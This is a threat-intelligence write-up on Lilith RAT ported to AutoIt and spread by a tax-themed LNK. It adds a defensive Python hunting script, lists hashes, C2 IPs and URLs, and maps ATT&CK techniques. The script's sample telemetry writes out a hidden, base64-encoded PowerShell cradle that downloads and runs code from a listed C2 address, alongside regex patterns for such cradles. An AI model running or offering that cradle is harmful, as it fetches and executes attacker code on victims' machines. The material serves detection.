Threat Tracking: Analysis of Lilith RAT ported to AutoIt Script

Aug. 23, 2024, 10:01 a.m.

Description

In April 2024, S2W's Threat Research and Intelligence Center TALON analyzed a malicious LNK file disguised as a list of explanatory documents on tax evasion. Opening the LNK executes a PowerShell command that downloads Lilith RAT, ported to an AutoIt script, from the attacker's server and runs it; the RAT then establishes a reverse shell on the infected system. Overlaps with the KONNI group's tradecraft, such as command obfuscation and the use of malware ported to AutoIt, suggest the threat actor behind this attack could be linked to KONNI.
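As an added example (not code from S2W's report, and not the malware's own logic), the following Python hunts Sysmon-style process and network telemetry for the chain described above: a PowerShell download cradle launched from Explorer (the usual parent when a user double-clicks an LNK), an AutoIt script started by that shell, and connections to the hosts and non-standard ports listed under Indicators, plus any file whose SHA-256 matches a listed sample. The sample events are constructed, and the process-tree and command-line patterns (including the assumption that the script runs under AutoIt3.exe) are assumptions about how such a chain typically looks rather than details quoted from the report. The indicator values themselves are copied from this page.

```python
"""Added example, not from the S2W report: hunt Sysmon-style telemetry for the
LNK -> PowerShell download cradle -> AutoIt RAT -> C2 chain and for the listed
indicators. SAMPLE_EVENTS is constructed; the behavioural patterns are assumed."""
import base64
import re
from typing import Dict, Iterable, List, Tuple

# Indicators copied from the page.
C2_HOSTS = {"93.183.93.185", "62.113.118.157", "185.231.154.22", "www.cammirando.com"}
C2_PORTS = {57860, 52720}  # ports from the listed URLs (T1571 Non-Standard Port)
SAMPLE_SHA256 = {
    "e63082cf4db94f06d583a6313e48353366b44ce07b7ffceacc5bc4db88bd8810",
    "c2cc785857c64fa1f8fbb2e359a2638f187cd77cd29ca6701e38d750e822faa4",
    "ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015",
    "9e1a3653029b5378736ea1debba44cd81988de73b6d8689f9eba792e719da79a",
    "808425bc599cd60989c90978d179af1d4c72dd7abfe5e0518aca44b48af15725",
    "7c08b9178c05ab765a3d7754ac99f4ba1abddb226dbb6cc898bc692bba1898a1",
    "77d05cc623f860ca2e6d47cdafc517aa0612de88291de7f2a3d95c5d04f1658a",
    "778e46f8f3641a92d34da68dffc168fdc936841c5ad3d8b44da62a7b2dfe2ee1",
    "5ea09247ad85915a8d1066d1825061cc8348e14c4e060e1eba840d5e56ab3e4d",
    "5bcfb56c4c884e3657bbfeacca37853113d640b77dff9af519c08c4b64ca029d",
    "2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e",
    "0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed",
    "237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d",
}

# Assumed download-cradle markers; the report does not quote the command line.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"net\.webclient|start-bitstransfer|\bcurl\b", re.I)
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

Event = Dict[str, object]


def base(path: object) -> str:
    """Lower-cased file name of a Windows path."""
    return str(path).rsplit("\\", 1)[-1].lower()


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def expand_encoded(cmd: str) -> str:
    """Append the decoded -enc payload so cradle matching also sees encoded commands."""
    m = ENCODED.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
    except ValueError:
        return cmd


def hunt(events: Iterable[Event]) -> List[Tuple[str, str]]:
    """Return (event id, finding) pairs for every rule an event matches."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        eid = str(ev["id"])
        if str(ev.get("sha256", "")).lower() in SAMPLE_SHA256:
            hits.append((eid, "hash matches a listed sample"))
        if ev["type"] == "process":
            image, parent = base(ev["image"]), base(ev.get("parent", ""))
            cmd = expand_encoded(str(ev.get("cmdline", "")))
            # A double-clicked LNK runs its target under explorer.exe (T1204.002).
            if image in SHELLS and parent == "explorer.exe" and CRADLE.search(cmd):
                tag = "encoded " if ENCODED.search(cmd) else ""
                hits.append((eid, f"{tag}shell download cradle under Explorer (T1059.001/T1105)"))
            # Assumed execution path: AutoIt interpreter or .au3 script started by the shell.
            if (image == "autoit3.exe" or ".au3" in cmd.lower()) and parent in SHELLS:
                hits.append((eid, "AutoIt script launched from a shell"))
        elif ev["type"] == "network":
            dst, port = str(ev.get("dst", "")).lower(), int(ev.get("port", 0))
            if dst in C2_HOSTS:
                hits.append((eid, f"connection to listed C2 {dst}:{port}"))
            elif port in C2_PORTS:
                hits.append((eid, f"connection on listed non-standard port {port} (T1571)"))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Event] = [  # constructed telemetry, not from the report
    {"id": 1, "type": "process", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://62.113.118.157:57860/')")},
    {"id": 2, "type": "process", "image": r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe",
     "parent": PS, "cmdline": r"AutoIt3.exe C:\Users\u\AppData\Local\Temp\svc.au3"},
    {"id": 3, "type": "network", "image": r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe",
     "dst": "93.183.93.185", "port": 57860},
    {"id": 4, "type": "file", "path": r"C:\Users\u\Downloads\list.lnk",
     "sha256": "e63082cf4db94f06d583a6313e48353366b44ce07b7ffceacc5bc4db88bd8810"},
    {"id": 5, "type": "process", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\tools\\backup.ps1"},  # benign
    {"id": 6, "type": "network", "image": r"C:\Program Files\Browser\browser.exe",
     "dst": "203.0.113.10", "port": 443},  # benign
]

if __name__ == "__main__":
    for eid, finding in hunt(SAMPLE_EVENTS):
        print(eid, finding)
```

The -EncodedCommand handling matters in practice: a cradle hidden behind -enc never contains "DownloadString" in the raw command line, so string matching without decoding misses exactly the obfuscated variant the report associates with this actor. The port rule is deliberately secondary to the host rule and should be tuned to the environment, since 57860 and 52720 can collide with legitimate ephemeral-port traffic.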

Date

Published: Aug. 23, 2024, 9:41 a.m.
Created: Aug. 23, 2024, 9:41 a.m.
Modified: Aug. 23, 2024, 10:01 a.m.

Indicators

SHA-256 file hashes

e63082cf4db94f06d583a6313e48353366b44ce07b7ffceacc5bc4db88bd8810
c2cc785857c64fa1f8fbb2e359a2638f187cd77cd29ca6701e38d750e822faa4
ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015
9e1a3653029b5378736ea1debba44cd81988de73b6d8689f9eba792e719da79a
808425bc599cd60989c90978d179af1d4c72dd7abfe5e0518aca44b48af15725
7c08b9178c05ab765a3d7754ac99f4ba1abddb226dbb6cc898bc692bba1898a1
77d05cc623f860ca2e6d47cdafc517aa0612de88291de7f2a3d95c5d04f1658a
778e46f8f3641a92d34da68dffc168fdc936841c5ad3d8b44da62a7b2dfe2ee1
5ea09247ad85915a8d1066d1825061cc8348e14c4e060e1eba840d5e56ab3e4d
5bcfb56c4c884e3657bbfeacca37853113d640b77dff9af519c08c4b64ca029d
2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

IPv4 addresses

93.183.93.185
62.113.118.157
185.231.154.22

Domain

www.cammirando.com

URLs (non-standard ports)

http://62.113.118.157:57860
http://93.183.93.185:57860
http://185.231.154.22:52720

Attack Patterns

Lilith RAT

puNK-003

T1053.005 Scheduled Task/Job: Scheduled Task
T1564.003 Hide Artifacts: Hidden Window
T1539 Steal Web Session Cookie
T1564.001 Hide Artifacts: Hidden Files and Directories
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1059.001 Command and Scripting Interpreter: PowerShell
T1571 Non-Standard Port
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1518.001 Software Discovery: Security Software Discovery
T1204.002 User Execution: Malicious File
T1105 Ingress Tool Transfer
T1041 Exfiltration Over C2 Channel